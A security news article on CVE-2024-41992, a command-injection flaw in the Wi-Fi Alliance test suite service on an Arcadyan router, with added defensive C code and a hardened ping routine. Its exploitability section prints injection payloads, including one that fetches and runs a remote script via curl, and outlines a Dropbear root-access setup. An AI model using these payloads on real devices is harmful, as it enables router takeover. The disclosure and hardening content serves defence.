
A critical zero-day vulnerability has been discovered in the Arcadyan FMIMG51AX000J router, and other devices that ship the Wi-Fi Alliance's test suite may be affected as well. The flaw allows remote attackers to execute arbitrary code.
An independent security researcher working with SSD Secure Disclosure identified the vulnerability, which is tracked as CVE-2024-41992.

Despite contacting the Wi-Fi Alliance via CERT VINCE in April 2024 (Case VU#123336), no clear timeline for a fix has been provided.
Therefore, the researchers decided to publicize the issue to warn users, even though a solution is not yet available.
“We contacted the WiFi Alliance via CERT VINCE (Case VU#123336) several months later, in April 2024, but due to lack of clarity on when a fix was scheduled to be released (by either vendors or the WiFi Alliance), we decided to release this advisory to inform the public of this vulnerability without being able to provide a fix,” the SSD Secure Disclosure team said.
Technical details
The researcher ran a network scan using Nmap against the router and identified ports 8000 and 8080 as open.
Nmap was unable to identify the services running on these ports, but on closer investigation the researcher found responses indicating the presence of a "DUT-Wi-FiTestSuite" service. The probe definition below, in nmap-service-probes format, matches that banner:
##############################NEXT PROBE##############################
Probe TCP wfa_dut q|\x01\x00\x00\x00|
rarity 1
ports 8000,8080
match wfa_dut m|^\x01\x00\x08\x02\x04\x00\x00\x00\x00\x00\x00\x00DUT-Wi-FiTestSuite-|
The service is a testing utility developed by the Wi-Fi Alliance to test routers and is not typically found on production devices.
The service listens for packets in a specific format called Type-Length-Value (TLV), a packet structure that consists of 2 bytes of type, 2 bytes of length, and a value ranging from 0 to 640 bytes.
The data is sent in big endian format but processed in little endian format on the device. The service has a list of functions that can be called with these packets.
For example, to get the version of the Wi-Fi test suite, send a packet with type value “1” and length “0”.
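As an added illustration of the packet format just described (this is example code written for this article, not code from the advisory or from the Wi-Fi Test Suite), the decoder below reads the 2-byte type and 2-byte length in the byte order the device uses when it processes the packet (little-endian; the Nmap probe bytes \x01\x00\x00\x00 for "type 1, length 0" are consistent with that), enforces the 640-byte bound on the value, and rejects a declared length that exceeds the bytes actually received. A second function flags values carrying shell metacharacters, which is the kind of heuristic a monitoring rule for these ports would apply. The sample packets are constructed for the example.

```c
/* Added example (not from the advisory or the Wi-Fi Test Suite sources):
 * a bounds-checked decoder for the TLV packets described above, plus a
 * simple check that flags values carrying shell metacharacters. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define WFA_TLV_MAX_VALUE 640   /* upper bound on the value field, as stated on the page */
#define WFA_TLV_HDR_LEN   4     /* 2 bytes type + 2 bytes length */

typedef struct {
    uint16_t type;
    uint16_t length;
    const uint8_t *value;       /* points into the caller's buffer, not copied */
} wfa_tlv_t;

/* Read a 16-bit field in little-endian order, the order the device uses when
 * it processes the packet (the Nmap probe \x01\x00\x00\x00 for "type 1,
 * length 0" matches this). */
static uint16_t rd16le(const uint8_t *p)
{
    return (uint16_t)(p[0] | ((uint16_t)p[1] << 8));
}

/* Decode one TLV from buf. Returns 0 on success, -1 if the packet is
 * malformed: too short for a header, declared length above the 640-byte
 * bound, or declared length longer than the bytes actually received (the
 * case a naive decoder would turn into an over-read). */
int wfa_tlv_decode(const uint8_t *buf, size_t buflen, wfa_tlv_t *out)
{
    if (buf == NULL || out == NULL || buflen < WFA_TLV_HDR_LEN)
        return -1;
    uint16_t type = rd16le(buf);
    uint16_t length = rd16le(buf + 2);
    if (length > WFA_TLV_MAX_VALUE)
        return -1;
    if ((size_t)length > buflen - WFA_TLV_HDR_LEN)
        return -1;
    out->type = type;
    out->length = length;
    out->value = buf + WFA_TLV_HDR_LEN;
    return 0;
}

/* Return 1 if the value contains characters that have no place in a
 * parameter the service splices into a shell command (command substitution,
 * separators, redirection, quoting), 0 otherwise. Useful as a log/IDS
 * heuristic for traffic to ports 8000 and 8080. */
int wfa_tlv_value_has_shell_meta(const wfa_tlv_t *tlv)
{
    static const char meta[] = "$`;|&<>()\"'\n";
    for (size_t i = 0; i < tlv->length; i++) {
        if (tlv->value[i] == 0)
            continue;               /* strchr would match the terminator */
        if (strchr(meta, (char)tlv->value[i]) != NULL)
            return 1;
    }
    return 0;
}

int main(void)
{
    /* Constructed sample: the "get version" request from the text, type 1, length 0. */
    const uint8_t get_version[] = { 0x01, 0x00, 0x00, 0x00 };
    /* Constructed sample: type 2 carrying the value quoted on the page. */
    const char *payload = "$(sleep 5)";
    uint8_t pkt[WFA_TLV_HDR_LEN + 16] = { 0x02, 0x00, 0x0a, 0x00 };
    memcpy(pkt + WFA_TLV_HDR_LEN, payload, strlen(payload));
    wfa_tlv_t t;
    if (wfa_tlv_decode(get_version, sizeof get_version, &t) == 0)
        printf("type=%u length=%u meta=%d\n", t.type, t.length, wfa_tlv_value_has_shell_meta(&t));
    if (wfa_tlv_decode(pkt, WFA_TLV_HDR_LEN + strlen(payload), &t) == 0)
        printf("type=%u length=%u meta=%d\n", t.type, t.length, wfa_tlv_value_has_shell_meta(&t));
    return 0;
}
```

The length check against the received byte count is the part worth copying: the service's own parser trusts the declared length, which is what lets oversized or malformed values reach the command-building code.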
I looked into whether it's possible to use this service to execute commands, and it is possible, although in a limited way.
The function wfaDecodeTLV decodes the received packet and extracts the type, length, and value. wfaStaGetIpConfig then uses the parameters carried in these packets to build and execute system commands; for example, the first 16 bytes of the parameters are formatted into a command string, which is then executed.
It turns out that it’s possible to inject commands, but with significant limitations: you can inject short commands by crafting a packet of a specific type and length.
For example, with the value $(sleep 5) you can execute a sleep command, but the length of the command is limited to 13 characters because of the 16-byte parameter space.
Although the service allows command execution, the length of the commands that can be injected is short, limiting its potential for exploitation.
This makes more complex exploits more difficult to carry out, but highlights the potential security risk of having this service in exposed environments.
Exploitability
While character-count restrictions limited early attempts at command injection, the researchers found that the wfaTGSendPing functionality accepts a much longer parameter.
// In wfa_tg.h
// #define IPV6_ADDRESS_STRING_LEN 40
typedef struct _tg_ping_start
{
    char dipaddr[IPV6_ADDRESS_STRING_LEN]; /* destination/remote ip address */
    int frameSize;
    float frameRate;
    int duration;
    int type;
    int qos;
    int iptype;
    int dscp;
} tgPingStart_t;
By taking advantage of the longer IPv6 address fields, an attacker can execute complex commands and take control of the device.
/* staPing->dipaddr (up to 40 attacker-supplied bytes) is formatted into cmdStr
   without validation and then handed to system(), i.e. to /bin/sh. */
if (staPing->iptype == 2)
{
    if (tos > 0)
        sprintf(cmdStr, "echo streamid=%i > /tmp/spout_%d.txt;wfaping6.sh %s %s -i %f -c %i -Q %d -s %i -q >> /tmp/spout_%d.txt 2>/dev/null",
                streamid, streamid, bflag, staPing->dipaddr, *interval, totalpkts, tos, staPing->frameSize, streamid);
    else
        sprintf(cmdStr, "echo streamid=%i > /tmp/spout_%d.txt;wfaping6.sh %s %s -i %f -c %i -s %i -q >> /tmp/spout_%d.txt 2>/dev/null",
                streamid, streamid, bflag, staPing->dipaddr, *interval, totalpkts, staPing->frameSize, streamid);
    sret = system(cmdStr);
}
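For contrast, here is a hardened version of that ping-start path. It is example code written for this article, not a patch from the Wi-Fi Alliance or Arcadyan, and it assumes the same variable names as the snippet (bflag, interval, totalpkts, tos, frameSize, streamid) and that iptype 1 means IPv4 and 2 means IPv6 (only the value 2 is visible on the page). The fix has two parts: dipaddr is accepted only if inet_pton parses it as an IP literal, which rules out command substitution such as $(...), and wfaping6.sh is started with fork/execvp on an argv array instead of a shell string, so even an unexpected byte in a parameter cannot be reinterpreted as shell syntax. The scratch buffer holds the argv strings and is sized by the caller.

```c
/* Added example (not the Wi-Fi Test Suite's code): a hardened version of the
 * ping-start path quoted above. Assumes the same variable names as the
 * snippet; the bflag value used in the test is constructed. */
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define IPV6_ADDRESS_STRING_LEN 40   /* from wfa_tg.h as quoted above */
#define PING_ARGV_MAX 16

/* Return 1 if addr is a well-formed IPv4 (iptype 1, assumed) or IPv6
 * (iptype 2, as in the snippet) literal, 0 otherwise. inet_pton accepts only
 * digits, dots, hex digits and colons, so "$(...)" and friends are rejected. */
int ping_addr_is_valid(const char *addr, int iptype)
{
    unsigned char buf[sizeof(struct in6_addr)];
    if (addr == NULL || memchr(addr, 0, IPV6_ADDRESS_STRING_LEN) == NULL)
        return 0;                       /* no terminator inside the 40-byte field */
    if (iptype == 2)
        return inet_pton(AF_INET6, addr, buf) == 1;
    if (iptype == 1)
        return inet_pton(AF_INET, addr, buf) == 1;
    return 0;
}

/* Build an argv for wfaping6.sh with no shell involved: each parameter is
 * one argv entry. Returns the number of entries (argv is NULL-terminated)
 * or -1 if the address is rejected or a buffer is too small. */
int build_ping6_argv(char *argv[], size_t argvsz, char *scratch, size_t scratchsz,
                     const char *bflag, const char *dipaddr, float interval,
                     int totalpkts, int tos, int frameSize)
{
    if (!ping_addr_is_valid(dipaddr, 2) || argvsz < PING_ARGV_MAX)
        return -1;
    size_t used = 0;
    int n = 0;
    /* Format one argument into scratch and point argv at it. */
#define ARG(...) do { \
        int w = snprintf(scratch + used, scratchsz - used, __VA_ARGS__); \
        if (w < 0 || (size_t)w >= scratchsz - used) return -1; \
        argv[n++] = scratch + used; used += (size_t)w + 1; } while (0)
    ARG("wfaping6.sh");
    ARG("%s", bflag);
    ARG("%s", dipaddr);
    ARG("-i"); ARG("%f", interval);
    ARG("-c"); ARG("%i", totalpkts);
    if (tos > 0) { ARG("-Q"); ARG("%d", tos); }
    ARG("-s"); ARG("%i", frameSize);
    ARG("-q");
#undef ARG
    argv[n] = NULL;
    return n;
}

/* Replace the "echo streamid=... > file; ... >> file" shell string: write the
 * header ourselves, then fork/exec wfaping6.sh with stdout appended to the
 * same file. Returns the child's exit status or -1. */
int run_ping6(int streamid, char *const argv[])
{
    char path[64];
    snprintf(path, sizeof path, "/tmp/spout_%d.txt", streamid);
    FILE *f = fopen(path, "w");
    if (f == NULL) return -1;
    fprintf(f, "streamid=%i\n", streamid);
    fclose(f);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (freopen(path, "a", stdout) == NULL) _exit(127);
        execvp(argv[0], argv);
        _exit(127);                     /* exec failed; no shell was ever involved */
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Validating the address is the smaller change and already closes the injection shown on the page; dropping system() in favour of execvp is what keeps the code safe when the next parameter is added without a validator.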
Researchers can leverage binaries already present on targeted systems for broader exploitation.
Remote commands can be executed by sending specific packets. The packet has the following structure: type 2 (0x02), length 33 (0x21), and a value holding the command: '$(sh -c "$(curl 192.168.1.247:4)")'.
In parallel, the researcher ran a Python server on the attacking machine that serves several components: a bash script that downloads and configures Dropbear, the Dropbear binary, and the dropbearkey binary.
Additionally, the server is configured to print POST requests to the console for debugging. This setup yields full root access to the device, and the researcher has published the full exploit here.
This vulnerability highlights the importance of robust security measures in IoT and networked devices. Users of affected models are advised to monitor for firmware updates and apply patches as soon as they are available. In the meantime, we encourage you to ensure the security of your network access and monitor for unusual activity.


